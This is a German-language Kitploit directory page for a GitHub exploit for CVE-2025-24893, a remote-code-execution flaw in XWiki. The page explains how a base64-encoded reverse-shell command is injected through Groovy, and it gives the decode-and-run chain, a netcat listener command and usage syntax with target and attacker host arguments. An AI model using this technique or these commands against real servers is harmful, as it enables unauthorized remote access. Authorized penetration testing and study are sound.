Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
xwiki-15.10.8-reverse-shell-cve-2025-24893 — CVE-2025-24893 RCE-Exploit für XWiki mit Reverse-Shell-Funktionalität | Kitploit
Tools/GitHubGitHub/bishben/xwiki-15.10.8-reverse-shell-cve-2025-24893
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubbishben/xwiki-15.10.8-reverse-shell-cve-2025-24893

xwiki-15.10.8-reverse-shell-cve-2025-24893

CVE-2025-24893 RCE-Exploit für XWiki mit Reverse-Shell-Funktionalität

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 11 MonatenNoch nicht geprüft

CVE-2025-24893 Reverse Shell Exploit für XWiki

Haftungsausschluss: Dieses Skript ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests gedacht. Verwenden Sie es nicht auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben. Missbrauch kann illegal und gefährlich sein.

Beschreibung

Dieses Python-Skript nutzt CVE-2025-24893 aus, eine Schwachstelle zur Remote-Code-Ausführung, die XWiki-Versionen bis 15.10.10 betrifft.

  • Getestete Version: XWiki 15.10.8
  • Auswirkung: Ermöglicht die Ausführung beliebiger Befehle auf dem Zielserver.
  • Python-Version: Geschrieben und getestet in Python 3

Diese Version erweitert das ursprüngliche PoC von Al Baradi Joy, um eine Reverse-Shell zu starten. Das ursprüngliche PoC finden Sie hier.

Funktionsweise

  • XWiki führt Groovy-Code über den URL-Parameter aus.

  • Der Exploit injiziert einen bash -c-Befehl in diese Groovy-Vorlage.

  • Eine normale Reverse-Shell enthält mehrere Anführungszeichen (' und "), die die Groovy-Auswertung und die URL stören würden.

  • Um dies zu lösen, codiert das Skript den einzeiligen Shell-Befehl in Base64.

  • Die Payload wird dann in der URL gesendet und mit der folgenden Kette ausgeführt:

    {echo,<base64>} | {base64,-d} | {bash,-i}

  • Dies dekodiert die Base64-Payload sicher und führt sie mit bash -i aus, was eine interaktive Reverse-Shell ergibt.

Ziel-URL-Format

  • Format: http://<target-host>
  • NICHT angeben:
    • Einen abschließenden Schrägstrich / am Ende
    • Den Pfad /xwiki (das Skript hängt ihn automatisch an)

Beispiele:

root@kitploit:~
# Korrekt
http://10.129.95.114:8080
http://example.com:8080

# Falsch
http://10.129.95.114:8080/         # abschließender Schrägstrich
http://example.com/xwiki            # enthält /xwiki

Listener-Einrichtung

Bevor Sie den Exploit ausführen, müssen Sie einen Listener auf Ihrem Rechner starten, um die Reverse-Shell zu empfangen.

Beispiel mit Netcat:

root@kitploit:~
nc -lvnp <lport>
  • <lport> muss mit dem Port übereinstimmen, den Sie als Argument für das Skript angeben.

Verwendung

root@kitploit:~
python3 cve-2025-24893.py <target_base_url> <lhost> <lport>

Beispiel:

root@kitploit:~
python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444
  • Das Skript gibt die vollständige Exploit-URL, die Base64-Payload und Anweisungen zur Überprüfung Ihres Listeners aus.

Referenzen

  • GHSA Advisory
  • XWiki Homepage
  • Ursprüngliches PoC von Al Baradi Joy

Danksagungen

  • Ursprünglicher Proof-of-Concept: Al Baradi Joy
  • Diese Version: Erweitert zum Starten einer Reverse-Shell für interaktive Befehlsausführung

Warnung

  • Verwenden Sie diesen Exploit nur in kontrollierten Umgebungen (HTB, Labor-Rechner, eigene VMs).
  • Die unbefugte Nutzung auf öffentlichen Servern ist illegal und kann zu strafrechtlichen Konsequenzen führen.
Tool herunterladen